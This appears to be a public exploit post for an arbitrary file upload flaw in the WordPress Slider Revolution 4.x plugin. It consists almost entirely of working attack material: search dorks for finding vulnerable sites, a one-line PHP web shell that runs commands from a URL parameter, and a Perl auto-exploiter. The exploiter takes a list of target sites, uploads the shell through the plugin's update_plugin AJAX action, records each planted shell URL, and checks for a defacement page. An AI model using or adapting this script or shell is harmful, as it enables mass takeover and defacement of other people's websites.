WordPress Slider Revolution 4.x.x Shell Upload

`=================================================================================================  
| # Title : WordPress - Slider Revolution 4.x.x WordPress - arbitrary file upload exploit |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) |   
| # Vendor : https://www.sliderrevolution.com/ |   
| # Dork : index off revslider\backup |   
plugins/revslider/public/assets/css/settings.css |  
revslider.php "index of" |   
wp-content/plugins/revslider/ 2013 |  
=================================================================================================  
  
[+] poc :  
  
[+] Web shell upload :  
  
The following perl exploit will attempt to upload backdoor through the update_plugin function  
To use the exploit, be sure to compress the backdoor file with name [revslider.zip]  
Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension  
Because the exploit uploads a compressed file to the target  
  
[+] simple backdoor :  
  
<?php  
$cmd = $_GET['cmd'];  
system($cmd);  
?>   
  
[+] create a text file with name list.txt to save in it your targets  
  
[+] The exploit and the backdoor must be in the same folder and path  
  
[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine   
  
[+] Perl exploit :  
  
#!/usr/bin/perl  
  
use LWP::UserAgent;  
  
system(($^O eq 'MSWin32') ? 'cls' : 'clear');  
  
head();  
  
my $usage = " \nperl $0 <list.txt>\n perl $0 list.txt";  
die "$usage" unless $ARGV[0];  
  
open(tarrget,"<$ARGV[0]") or die "$!";  
while(<tarrget>){  
chomp($_);  
$target = $_;  
  
my $path = "wp-admin/admin-ajax.php";  
  
print "\nTarget => $target\n";  
  
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });  
$ua->timeout(10);  
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");  
my $req = $ua->get("$target/$path");  
if($req->is_success) {  
print "\n [+] Xploit Possibility Work :3\n \n";  
  
  
  
print " [*] Try Exploiting Vulnerability\n";  
print " [*] Xploiting $target\n";  
  
my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]);  
  
print " [*] Sent payload\n";  
  
if ($exploit->decoded_content =~ /Wrong update extracted folder/) {  
print " [+] Payload successfully executed\n";  
  
print " [*] Checking if shell was uploaded\n";  
my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php")->content;  
if($check =~/<br>/) {  
  
print " [+] Shell successfully uploaded\n";  
open(save, '>>Shell.txt');  
print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php?zeb\n";  
close(save);  
  
  
print " [*] Checking if Deface was uploaded now\n";  
  
my $def = $ua->get("$target/leet.html")->content;  
if($def = ~/Hacked/) {  
  
print " [+] Deface uploaded successfull\n";  
  
  
} else {print " [-] Deface not Uploaded :/"; }  
} else { print " [-] I'think Shell Not Uploaded :/\n"; }  
} else {  
print " [-] Payload failed: Fail\n";  
print "\n";  
  
}  
} else { print "\n [-]Xploit Fail \n"}  
  
sub head {  
print "\t +===============================================\n";  
print "\t | Auto Exploiter Revslider Shell Upload \n";  
print "\t | Edited: indoushka\n";  
print "\t +===============================================\n";  
}  
}  
  
Greetings to :=========================================================================================================================  
|  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |  
|  
=======================================================================================================================================  
`